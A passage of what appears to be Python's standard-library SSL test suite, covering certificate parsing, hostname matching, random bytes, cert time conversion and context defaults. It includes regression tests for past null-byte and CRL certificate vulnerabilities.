context.verify_mode = cert_reqs
if ca_certs is not None:
context.load_verify_locations(ca_certs)
if certfile is not None or keyfile is not None:
context.load_cert_chain(certfile, keyfile)
if ciphers is not None:
context.set_ciphers(ciphers)
return context.wrap_socket(sock, **kwargs)
def testing_context(server_cert=SIGNED_CERTFILE):
"""Create context
client_context, server_context, hostname = testing_context()
"""
if server_cert == SIGNED_CERTFILE:
hostname = SIGNED_CERTFILE_HOSTNAME
elif server_cert == SIGNED_CERTFILE2:
hostname = SIGNED_CERTFILE2_HOSTNAME
else:
raise ValueError(server_cert)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(server_cert)
server_context.load_verify_locations(SIGNING_CA)
return client_context, server_context, hostname
class BasicSocketTests(unittest.TestCase):
def test_constants(self):
ssl.CERT_NONE
ssl.CERT_OPTIONAL
ssl.CERT_REQUIRED
ssl.OP_CIPHER_SERVER_PREFERENCE
ssl.OP_SINGLE_DH_USE
if ssl.HAS_ECDH:
ssl.OP_SINGLE_ECDH_USE
if ssl.OPENSSL_VERSION_INFO >= (1, 0):
ssl.OP_NO_COMPRESSION
self.assertIn(ssl.HAS_SNI, {True, False})
self.assertIn(ssl.HAS_ECDH, {True, False})
ssl.OP_NO_SSLv2
ssl.OP_NO_SSLv3
ssl.OP_NO_TLSv1
ssl.OP_NO_TLSv1_3
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 1):
ssl.OP_NO_TLSv1_1
ssl.OP_NO_TLSv1_2
self.assertEqual(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv23)
def test_private_init(self):
with self.assertRaisesRegex(TypeError, "public constructor"):
with socket.socket() as s:
ssl.SSLSocket(s)
def test_str_for_enums(self):
# Make sure that the PROTOCOL_* constants have enum-like string
# reprs.
proto = ssl.PROTOCOL_TLS
self.assertEqual(str(proto), '_SSLMethod.PROTOCOL_TLS')
ctx = ssl.SSLContext(proto)
self.assertIs(ctx.protocol, proto)
def test_random(self):
v = ssl.RAND_status()
if support.verbose:
sys.stdout.write("\n RAND_status is %d (%s)\n"
% (v, (v and "sufficient randomness") or
"insufficient randomness"))
data, is_cryptographic = ssl.RAND_pseudo_bytes(16)
self.assertEqual(len(data), 16)
self.assertEqual(is_cryptographic, v == 1)
if v:
data = ssl.RAND_bytes(16)
self.assertEqual(len(data), 16)
else:
self.assertRaises(ssl.SSLError, ssl.RAND_bytes, 16)
# negative num is invalid
self.assertRaises(ValueError, ssl.RAND_bytes, -5)
self.assertRaises(ValueError, ssl.RAND_pseudo_bytes, -5)
if hasattr(ssl, 'RAND_egd'):
self.assertRaises(TypeError, ssl.RAND_egd, 1)
self.assertRaises(TypeError, ssl.RAND_egd, 'foo', 1)
ssl.RAND_add("this is a random string", 75.0)
ssl.RAND_add(b"this is a random bytes object", 75.0)
ssl.RAND_add(bytearray(b"this is a random bytearray object"), 75.0)
@unittest.skipUnless(os.name == 'posix', 'requires posix')
def test_random_fork(self):
status = ssl.RAND_status()
if not status:
self.fail("OpenSSL's PRNG has insufficient randomness")
rfd, wfd = os.pipe()
pid = os.fork()
if pid == 0:
try:
os.close(rfd)
child_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(child_random), 16)
os.write(wfd, child_random)
os.close(wfd)
except BaseException:
os._exit(1)
else:
os._exit(0)
else:
os.close(wfd)
self.addCleanup(os.close, rfd)
_, status = os.waitpid(pid, 0)
self.assertEqual(status, 0)
child_random = os.read(rfd, 16)
self.assertEqual(len(child_random), 16)
parent_random = ssl.RAND_pseudo_bytes(16)[0]
self.assertEqual(len(parent_random), 16)
self.assertNotEqual(child_random, parent_random)
maxDiff = None
def test_parse_cert(self):
# note that this uses an 'unofficial' function in _ssl.c,
# provided solely for this test, to exercise the certificate
# parsing code
self.assertEqual(
ssl._ssl._test_decode_cert(CERTFILE),
CERTFILE_INFO
)
self.assertEqual(
ssl._ssl._test_decode_cert(SIGNED_CERTFILE),
SIGNED_CERTFILE_INFO
)
# Issue #13034: the subjectAltName in some certificates
# (notably projects.developer.nokia.com:443) wasn't parsed
p = ssl._ssl._test_decode_cert(NOKIACERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(p['subjectAltName'],
(('DNS', 'projects.developer.nokia.com'),
('DNS', 'projects.forum.nokia.com'))
)
# extra OCSP and AIA fields
self.assertEqual(p['OCSP'], ('http://ocsp.verisign.com',))
self.assertEqual(p['caIssuers'],
('http://SVRIntl-G3-aia.verisign.com/SVRIntlG3.cer',))
self.assertEqual(p['crlDistributionPoints'],
('http://SVRIntl-G3-crl.verisign.com/SVRIntlG3.crl',))
def test_parse_cert_CVE_2019_5010(self):
p = ssl._ssl._test_decode_cert(TALOS_INVALID_CRLDP)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
self.assertEqual(
p,
{
'issuer': (
(('countryName', 'UK'),), (('commonName', 'cody-ca'),)),
'notAfter': 'Jun 14 18:00:58 2028 GMT',
'notBefore': 'Jun 18 18:00:58 2018 GMT',
'serialNumber': '02',
'subject': ((('countryName', 'UK'),),
(('commonName',
'codenomicon-vm-2.test.lal.cisco.com'),)),
'subjectAltName': (
('DNS', 'codenomicon-vm-2.test.lal.cisco.com'),),
'version': 3
}
)
def test_parse_cert_CVE_2013_4238(self):
p = ssl._ssl._test_decode_cert(NULLBYTECERT)
if support.verbose:
sys.stdout.write("\n" + pprint.pformat(p) + "\n")
subject = ((('countryName', 'US'),),
(('stateOrProvinceName', 'Oregon'),),
(('localityName', 'Beaverton'),),
(('organizationName', 'Python Software Foundation'),),
(('organizationalUnitName', 'Python Core Development'),),
(('commonName', 'null.python.org\x00example.org'),),
(('emailAddress', '[email protected]'),))
self.assertEqual(p['subject'], subject)
self.assertEqual(p['issuer'], subject)
if ssl._OPENSSL_API_VERSION >= (0, 9, 8):
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '2001:DB8:0:0:0:0:0:1\n'))
else:
# OpenSSL 0.9.7 doesn't support IPv6 addresses in subjectAltName
san = (('DNS', 'altnull.python.org\x00example.com'),
('email', '[email protected]\[email protected]'),
('URI', 'http://null.python.org\x00http://example.org'),
('IP Address', '192.0.2.1'),
('IP Address', '<invalid>'))
self.assertEqual(p['subjectAltName'], san)
def test_parse_all_sans(self):
p = ssl._ssl._test_decode_cert(ALLSANFILE)
self.assertEqual(p['subjectAltName'],
(
('DNS', 'allsans'),
('othername', '<unsupported>'),
('othername', '<unsupported>'),
('email', '[email protected]'),
('DNS', 'www.example.org'),
('DirName',
((('countryName', 'XY'),),
(('localityName', 'Castle Anthrax'),),
(('organizationName', 'Python Software Foundation'),),
(('commonName', 'dirname example'),))),
('URI', 'https://www.python.org/'),
('IP Address', '127.0.0.1'),
('IP Address', '0:0:0:0:0:0:0:1\n'),
('Registered ID', '1.2.3.4.5')
)
)
def test_DER_to_PEM(self):
with open(CAFILE_CACERT, 'r') as f:
pem = f.read()
d1 = ssl.PEM_cert_to_DER_cert(pem)
p2 = ssl.DER_cert_to_PEM_cert(d1)
d2 = ssl.PEM_cert_to_DER_cert(p2)
self.assertEqual(d1, d2)
if not p2.startswith(ssl.PEM_HEADER + '\n'):
self.fail("DER-to-PEM didn't include correct header:\n%r\n" % p2)
if not p2.endswith('\n' + ssl.PEM_FOOTER + '\n'):
self.fail("DER-to-PEM didn't include correct footer:\n%r\n" % p2)
def test_openssl_version(self):
n = ssl.OPENSSL_VERSION_NUMBER
t = ssl.OPENSSL_VERSION_INFO
s = ssl.OPENSSL_VERSION
self.assertIsInstance(n, int)
self.assertIsInstance(t, tuple)
self.assertIsInstance(s, str)
# Some sanity checks follow
# >= 0.9
self.assertGreaterEqual(n, 0x900000)
# < 3.0
self.assertLess(n, 0x30000000)
major, minor, fix, patch, status = t
self.assertGreaterEqual(major, 0)
self.assertLess(major, 3)
self.assertGreaterEqual(minor, 0)
self.assertLess(minor, 256)
self.assertGreaterEqual(fix, 0)
self.assertLess(fix, 256)
self.assertGreaterEqual(patch, 0)
self.assertLessEqual(patch, 63)
self.assertGreaterEqual(status, 0)
self.assertLessEqual(status, 15)
# Version string as returned by {Open,Libre}SSL, the format might change
if IS_LIBRESSL:
self.assertTrue(s.startswith("LibreSSL {:d}".format(major)),
(s, t, hex(n)))
else:
self.assertTrue(s.startswith("OpenSSL {:d}.{:d}.{:d}".format(major, minor, fix)),
(s, t, hex(n)))
@support.cpython_only
def test_refcycle(self):
# Issue #7943: an SSL object doesn't create reference cycles with
# itself.
s = socket.socket(socket.AF_INET)
ss = test_wrap_socket(s)
wr = weakref.ref(ss)
with support.check_warnings(("", ResourceWarning)):
del ss
self.assertEqual(wr(), None)
def test_wrapped_unconnected(self):
# Methods on an unconnected SSLSocket propagate the original
# OSError raise by the underlying socket object.
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertRaises(OSError, ss.recv, 1)
self.assertRaises(OSError, ss.recv_into, bytearray(b'x'))
self.assertRaises(OSError, ss.recvfrom, 1)
self.assertRaises(OSError, ss.recvfrom_into, bytearray(b'x'), 1)
self.assertRaises(OSError, ss.send, b'x')
self.assertRaises(OSError, ss.sendto, b'x', ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.dup)
self.assertRaises(NotImplementedError, ss.sendmsg,
[b'x'], (), 0, ('0.0.0.0', 0))
self.assertRaises(NotImplementedError, ss.recvmsg, 100)
self.assertRaises(NotImplementedError, ss.recvmsg_into,
[bytearray(100)])
def test_timeout(self):
# Issue #8524: when creating an SSL socket, the timeout of the
# original socket should be retained.
for timeout in (None, 0.0, 5.0):
s = socket.socket(socket.AF_INET)
s.settimeout(timeout)
with test_wrap_socket(s) as ss:
self.assertEqual(timeout, ss.gettimeout())
def test_errors_sslwrap(self):
sock = socket.socket()
self.assertRaisesRegex(ValueError,
"certfile must be specified",
ssl.wrap_socket, sock, keyfile=CERTFILE)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True)
self.assertRaisesRegex(ValueError,
"certfile must be specified for server-side operations",
ssl.wrap_socket, sock, server_side=True, certfile="")
with ssl.wrap_socket(sock, server_side=True, certfile=CERTFILE) as s:
self.assertRaisesRegex(ValueError, "can't connect in server-side mode",
s.connect, (HOST, 8080))
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock, certfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=CERTFILE, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(OSError) as cm:
with socket.socket() as sock:
ssl.wrap_socket(sock,
certfile=NONEXISTINGCERT, keyfile=NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
def bad_cert_test(self, certfile):
"""Check that trying to use the given client certificate fails"""
certfile = os.path.join(os.path.dirname(__file__) or os.curdir,
certfile)
sock = socket.socket()
self.addCleanup(sock.close)
with self.assertRaises(ssl.SSLError):
test_wrap_socket(sock,
certfile=certfile)
def test_empty_cert(self):
"""Wrapping with an empty cert file"""
self.bad_cert_test("nullcert.pem")
def test_malformed_cert(self):
"""Wrapping with a badly formatted certificate (syntax error)"""
self.bad_cert_test("badcert.pem")
def test_malformed_key(self):
"""Wrapping with a badly formatted key (syntax error)"""
self.bad_cert_test("badkey.pem")
def test_match_hostname(self):
def ok(cert, hostname):
ssl.match_hostname(cert, hostname)
def fail(cert, hostname):
self.assertRaises(ssl.CertificateError,
ssl.match_hostname, cert, hostname)
# -- Hostname matching --
cert = {'subject': ((('commonName', 'example.com'),),)}
ok(cert, 'example.com')
ok(cert, 'ExAmple.cOm')
fail(cert, 'www.example.com')
fail(cert, '.example.com')
fail(cert, 'example.org')
fail(cert, 'exampleXcom')
cert = {'subject': ((('commonName', '*.a.com'),),)}
ok(cert, 'foo.a.com')
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
# only match wildcards when they are the only thing
# in left-most segment
cert = {'subject': ((('commonName', 'f*.com'),),)}
fail(cert, 'foo.com')
fail(cert, 'f.com')
fail(cert, 'bar.com')
fail(cert, 'foo.a.com')
fail(cert, 'bar.foo.com')
# NULL bytes are bad, CVE-2013-4073
cert = {'subject': ((('commonName',
'null.python.org\x00example.org'),),)}
ok(cert, 'null.python.org\x00example.org') # or raise an error?
fail(cert, 'example.org')
fail(cert, 'null.python.org')
# error cases with wildcards
cert = {'subject': ((('commonName', '*.*.a.com'),),)}
fail(cert, 'bar.foo.a.com')
fail(cert, 'a.com')
fail(cert, 'Xa.com')
fail(cert, '.a.com')
cert = {'subject': ((('commonName', 'a.*.com'),),)}
fail(cert, 'a.foo.com')
fail(cert, 'a..com')
fail(cert, 'a.com')
# wildcard doesn't match IDNA prefix 'xn--'
idna = 'püthon.python.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
ok(cert, idna)
cert = {'subject': ((('commonName', 'x*.python.org'),),)}
fail(cert, idna)
cert = {'subject': ((('commonName', 'xn--p*.python.org'),),)}
fail(cert, idna)
# wildcard in first fragment and IDNA A-labels in sequent fragments
# are supported.
idna = 'www*.pythön.org'.encode("idna").decode("ascii")
cert = {'subject': ((('commonName', idna),),)}
fail(cert, 'www.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'www1.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'ftp.pythön.org'.encode("idna").decode("ascii"))
fail(cert, 'pythön.org'.encode("idna").decode("ascii"))
# Slightly fake real-world example
cert = {'notAfter': 'Jun 26 21:41:46 2011 GMT',
'subject': ((('commonName', 'linuxfrz.org'),),),
'subjectAltName': (('DNS', 'linuxfr.org'),
('DNS', 'linuxfr.com'),
('othername', '<unsupported>'))}
ok(cert, 'linuxfr.org')
ok(cert, 'linuxfr.com')
# Not a "DNS" entry
fail(cert, '<unsupported>')
# When there is a subjectAltName, commonName isn't used
fail(cert, 'linuxfrz.org')
# A pristine real-world example
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),),
(('commonName', 'mail.google.com'),))}
ok(cert, 'mail.google.com')
fail(cert, 'gmail.com')
# Only commonName is considered
fail(cert, 'California')
# -- IPv4 matching --
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (('DNS', 'example.com'),
('IP Address', '10.11.12.13'),
('IP Address', '14.15.16.17'))}
ok(cert, '10.11.12.13')
ok(cert, '14.15.16.17')
fail(cert, '14.15.16.18')
fail(cert, 'example.net')
# -- IPv6 matching --
if hasattr(socket, 'AF_INET6'):
cert = {'subject': ((('commonName', 'example.com'),),),
'subjectAltName': (
('DNS', 'example.com'),
('IP Address', '2001:0:0:0:0:0:0:CAFE\n'),
('IP Address', '2003:0:0:0:0:0:0:BABA\n'))}
ok(cert, '2001::cafe')
ok(cert, '2003::baba')
fail(cert, '2003::bebe')
fail(cert, 'example.net')
# -- Miscellaneous --
# Neither commonName nor subjectAltName
cert = {'notAfter': 'Dec 18 23:59:59 2011 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),))}
fail(cert, 'mail.google.com')
# No DNS entry in subjectAltName but a commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('commonName', 'mail.google.com'),)),
'subjectAltName': (('othername', 'blabla'), )}
ok(cert, 'mail.google.com')
# No DNS entry subjectAltName and no commonName
cert = {'notAfter': 'Dec 18 23:59:59 2099 GMT',
'subject': ((('countryName', 'US'),),
(('stateOrProvinceName', 'California'),),
(('localityName', 'Mountain View'),),
(('organizationName', 'Google Inc'),)),
'subjectAltName': (('othername', 'blabla'),)}
fail(cert, 'google.com')
# Empty cert / no cert
self.assertRaises(ValueError, ssl.match_hostname, None, 'example.com')
self.assertRaises(ValueError, ssl.match_hostname, {}, 'example.com')
# Issue #17980: avoid denials of service by refusing more than one
# wildcard per fragment.
cert = {'subject': ((('commonName', 'a*b.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"partial wildcards in leftmost label are not supported"):
ssl.match_hostname(cert, 'axxb.example.com')
cert = {'subject': ((('commonName', 'www.*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"wildcard can only be present in the leftmost label"):
ssl.match_hostname(cert, 'www.sub.example.com')
cert = {'subject': ((('commonName', 'a*b*.example.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"too many wildcards"):
ssl.match_hostname(cert, 'axxbxxc.example.com')
cert = {'subject': ((('commonName', '*'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
"sole wildcard without additional labels are not support"):
ssl.match_hostname(cert, 'host')
cert = {'subject': ((('commonName', '*.com'),),)}
with self.assertRaisesRegex(
ssl.CertificateError,
r"hostname 'com' doesn't match '\*.com'"):
ssl.match_hostname(cert, 'com')
# extra checks for _inet_paton()
for invalid in ['1', '', '1.2.3', '256.0.0.1', '127.0.0.1/24']:
with self.assertRaises(ValueError):
ssl._inet_paton(invalid)
for ipaddr in ['127.0.0.1', '192.168.0.1']:
self.assertTrue(ssl._inet_paton(ipaddr))
if hasattr(socket, 'AF_INET6'):
for ipaddr in ['::1', '2001:db8:85a3::8a2e:370:7334']:
self.assertTrue(ssl._inet_paton(ipaddr))
def test_server_side(self):
# server_hostname doesn't work for server sockets
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with socket.socket() as sock:
self.assertRaises(ValueError, ctx.wrap_socket, sock, True,
server_hostname="some.hostname")
def test_unknown_channel_binding(self):
# should raise ValueError for unknown type
s = socket.create_server(('127.0.0.1', 0))
c = socket.socket(socket.AF_INET)
c.connect(s.getsockname())
with test_wrap_socket(c, do_handshake_on_connect=False) as ss:
with self.assertRaises(ValueError):
ss.get_channel_binding("unknown-type")
s.close()
@unittest.skipUnless("tls-unique" in ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding not available")
def test_tls_unique_channel_binding(self):
# unconnected should return None for known type
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
# the same for server-side
s = socket.socket(socket.AF_INET)
with test_wrap_socket(s, server_side=True, certfile=CERTFILE) as ss:
self.assertIsNone(ss.get_channel_binding("tls-unique"))
def test_dealloc_warn(self):
ss = test_wrap_socket(socket.socket(socket.AF_INET))
r = repr(ss)
with self.assertWarns(ResourceWarning) as cm:
ss = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
def test_get_default_verify_paths(self):
paths = ssl.get_default_verify_paths()
self.assertEqual(len(paths), 6)
self.assertIsInstance(paths, ssl.DefaultVerifyPaths)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
paths = ssl.get_default_verify_paths()
self.assertEqual(paths.cafile, CERTFILE)
self.assertEqual(paths.capath, CAPATH)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_certificates(self):
self.assertTrue(ssl.enum_certificates("CA"))
self.assertTrue(ssl.enum_certificates("ROOT"))
self.assertRaises(TypeError, ssl.enum_certificates)
self.assertRaises(WindowsError, ssl.enum_certificates, "")
trust_oids = set()
for storename in ("CA", "ROOT"):
store = ssl.enum_certificates(storename)
self.assertIsInstance(store, list)
for element in store:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 3)
cert, enc, trust = element
self.assertIsInstance(cert, bytes)
self.assertIn(enc, {"x509_asn", "pkcs_7_asn"})
self.assertIsInstance(trust, (set, bool))
if isinstance(trust, set):
trust_oids.update(trust)
serverAuth = "1.3.6.1.5.5.7.3.1"
self.assertIn(serverAuth, trust_oids)
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
def test_enum_crls(self):
self.assertTrue(ssl.enum_crls("CA"))
self.assertRaises(TypeError, ssl.enum_crls)
self.assertRaises(WindowsError, ssl.enum_crls, "")
crls = ssl.enum_crls("CA")
self.assertIsInstance(crls, list)
for element in crls:
self.assertIsInstance(element, tuple)
self.assertEqual(len(element), 2)
self.assertIsInstance(element[0], bytes)
self.assertIn(element[1], {"x509_asn", "pkcs_7_asn"})
def test_asn1object(self):
expected = (129, 'serverAuth', 'TLS Web Server Authentication',
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertEqual(val, expected)
self.assertEqual(val.nid, 129)
self.assertEqual(val.shortname, 'serverAuth')
self.assertEqual(val.longname, 'TLS Web Server Authentication')
self.assertEqual(val.oid, '1.3.6.1.5.5.7.3.1')
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object, 'serverAuth')
val = ssl._ASN1Object.fromnid(129)
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertRaises(ValueError, ssl._ASN1Object.fromnid, -1)
with self.assertRaisesRegex(ValueError, "unknown NID 100000"):
ssl._ASN1Object.fromnid(100000)
for i in range(1000):
try:
obj = ssl._ASN1Object.fromnid(i)
except ValueError:
pass
else:
self.assertIsInstance(obj.nid, int)
self.assertIsInstance(obj.shortname, str)
self.assertIsInstance(obj.longname, str)
self.assertIsInstance(obj.oid, (str, type(None)))
val = ssl._ASN1Object.fromname('TLS Web Server Authentication')
self.assertEqual(val, expected)
self.assertIsInstance(val, ssl._ASN1Object)
self.assertEqual(ssl._ASN1Object.fromname('serverAuth'), expected)
self.assertEqual(ssl._ASN1Object.fromname('1.3.6.1.5.5.7.3.1'),
expected)
with self.assertRaisesRegex(ValueError, "unknown object 'serverauth'"):
ssl._ASN1Object.fromname('serverauth')
def test_purpose_enum(self):
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.1')
self.assertIsInstance(ssl.Purpose.SERVER_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.SERVER_AUTH, val)
self.assertEqual(ssl.Purpose.SERVER_AUTH.nid, 129)
self.assertEqual(ssl.Purpose.SERVER_AUTH.shortname, 'serverAuth')
self.assertEqual(ssl.Purpose.SERVER_AUTH.oid,
'1.3.6.1.5.5.7.3.1')
val = ssl._ASN1Object('1.3.6.1.5.5.7.3.2')
self.assertIsInstance(ssl.Purpose.CLIENT_AUTH, ssl._ASN1Object)
self.assertEqual(ssl.Purpose.CLIENT_AUTH, val)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.nid, 130)
self.assertEqual(ssl.Purpose.CLIENT_AUTH.shortname, 'clientAuth')
self.assertEqual(ssl.Purpose.CLIENT_AUTH.oid,
'1.3.6.1.5.5.7.3.2')
def test_unsupported_dtls(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
self.addCleanup(s.close)
with self.assertRaises(NotImplementedError) as cx:
test_wrap_socket(s, cert_reqs=ssl.CERT_NONE)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(NotImplementedError) as cx:
ctx.wrap_socket(s)
self.assertEqual(str(cx.exception), "only stream sockets are supported")
def cert_time_ok(self, timestring, timestamp):
self.assertEqual(ssl.cert_time_to_seconds(timestring), timestamp)
def cert_time_fail(self, timestring):
with self.assertRaises(ValueError):
ssl.cert_time_to_seconds(timestring)
@unittest.skipUnless(utc_offset(),
'local time needs to be different from UTC')
def test_cert_time_to_seconds_timezone(self):
# Issue #19940: ssl.cert_time_to_seconds() returns wrong
# results if local timezone is not UTC
self.cert_time_ok("May 9 00:00:00 2007 GMT", 1178668800.0)
self.cert_time_ok("Jan 5 09:34:43 2018 GMT", 1515144883.0)
def test_cert_time_to_seconds(self):
timestring = "Jan 5 09:34:43 2018 GMT"
ts = 1515144883.0
self.cert_time_ok(timestring, ts)
# accept keyword parameter, assert its name
self.assertEqual(ssl.cert_time_to_seconds(cert_time=timestring), ts)
# accept both %e and %d (space or zero generated by strftime)
self.cert_time_ok("Jan 05 09:34:43 2018 GMT", ts)
# case-insensitive
self.cert_time_ok("JaN 5 09:34:43 2018 GmT", ts)
self.cert_time_fail("Jan 5 09:34 2018 GMT") # no seconds
self.cert_time_fail("Jan 5 09:34:43 2018") # no GMT
self.cert_time_fail("Jan 5 09:34:43 2018 UTC") # not GMT timezone
self.cert_time_fail("Jan 35 09:34:43 2018 GMT") # invalid day
self.cert_time_fail("Jon 5 09:34:43 2018 GMT") # invalid month
self.cert_time_fail("Jan 5 24:00:00 2018 GMT") # invalid hour
self.cert_time_fail("Jan 5 09:60:43 2018 GMT") # invalid minute
newyear_ts = 1230768000.0
# leap seconds
self.cert_time_ok("Dec 31 23:59:60 2008 GMT", newyear_ts)
# same timestamp
self.cert_time_ok("Jan 1 00:00:00 2009 GMT", newyear_ts)
self.cert_time_ok("Jan 5 09:34:59 2018 GMT", 1515144899)
# allow 60th second (even if it is not a leap second)
self.cert_time_ok("Jan 5 09:34:60 2018 GMT", 1515144900)
# allow 2nd leap second for compatibility with time.strptime()
self.cert_time_ok("Jan 5 09:34:61 2018 GMT", 1515144901)
self.cert_time_fail("Jan 5 09:34:62 2018 GMT") # invalid seconds
# no special treatment for the special value:
# 99991231235959Z (rfc 5280)
self.cert_time_ok("Dec 31 23:59:59 9999 GMT", 253402300799.0)
@support.run_with_locale('LC_ALL', '')
def test_cert_time_to_seconds_locale(self):
# `cert_time_to_seconds()` should be locale independent
def local_february_name():
return time.strftime('%b', (1, 2, 3, 4, 5, 6, 0, 0, 0))
if local_february_name().lower() == 'feb':
self.skipTest("locale-specific month name needs to be "
"different from C locale")
# locale-independent
self.cert_time_ok("Feb 9 00:00:00 2007 GMT", 1170979200.0)
self.cert_time_fail(local_february_name() + " 9 00:00:00 2007 GMT")
def test_connect_ex_error(self):
server = socket.socket(socket.AF_INET)
self.addCleanup(server.close)
port = support.bind_port(server) # Reserve port but don't listen
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
rc = s.connect_ex((HOST, port))
# Issue #19919: Windows machines or VMs hosted on Windows
# machines sometimes return EWOULDBLOCK.
errors = (
errno.ECONNREFUSED, errno.EHOSTUNREACH, errno.ETIMEDOUT,
errno.EWOULDBLOCK,
)
self.assertIn(rc, errors)
class ContextTests(unittest.TestCase):
def test_constructor(self):
for protocol in PROTOCOLS:
ssl.SSLContext(protocol)
ctx = ssl.SSLContext()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertRaises(ValueError, ssl.SSLContext, -1)
self.assertRaises(ValueError, ssl.SSLContext, 42)
def test_protocol(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.protocol, proto)
def test_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers("ALL")
ctx.set_ciphers("DEFAULT")
with self.assertRaisesRegex(ssl.SSLError, "No cipher can be selected"):
ctx.set_ciphers("^$:,;?*'dorothyx")
@unittest.skipUnless(PY_SSL_DEFAULT_CIPHERS == 1,
"Test applies only to Python default ciphers")
def test_python_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ciphers = ctx.get_ciphers()
for suite in ciphers:
name = suite['name']
self.assertNotIn("PSK", name)
self.assertNotIn("SRP", name)
self.assertNotIn("MD5", name)
self.assertNotIn("RC4", name)
self.assertNotIn("3DES", name)
@unittest.skipIf(ssl.OPENSSL_VERSION_INFO < (1, 0, 2, 0, 0), 'OpenSSL too old')
def test_get_ciphers(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_ciphers('AESGCM')
names = set(d['name'] for d in ctx.get_ciphers())
self.assertIn('AES256-GCM-SHA384', names)
self.assertIn('AES128-GCM-SHA256', names)
def test_options(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
# OP_ALL | OP_NO_SSLv2 | OP_NO_SSLv3 is the default value
default = (ssl.OP_ALL | ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
# SSLContext also enables these by default
default |= (OP_NO_COMPRESSION | OP_CIPHER_SERVER_PREFERENCE |
OP_SINGLE_DH_USE | OP_SINGLE_ECDH_USE |
OP_ENABLE_MIDDLEBOX_COMPAT)
self.assertEqual(default, ctx.options)
ctx.options |= ssl.OP_NO_TLSv1
self.assertEqual(default | ssl.OP_NO_TLSv1, ctx.options)
if can_clear_options():
ctx.options = (ctx.options & ~ssl.OP_NO_TLSv1)
self.assertEqual(default, ctx.options)
ctx.options = 0
# Ubuntu has OP_NO_SSLv3 forced on by default
self.assertEqual(0, ctx.options & ~ssl.OP_NO_SSLv3)
else:
with self.assertRaises(ValueError):
ctx.options = 0
def test_verify_mode_protocol(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
# Default value
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
ctx.verify_mode = ssl.CERT_OPTIONAL
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
ctx.verify_mode = ssl.CERT_REQUIRED
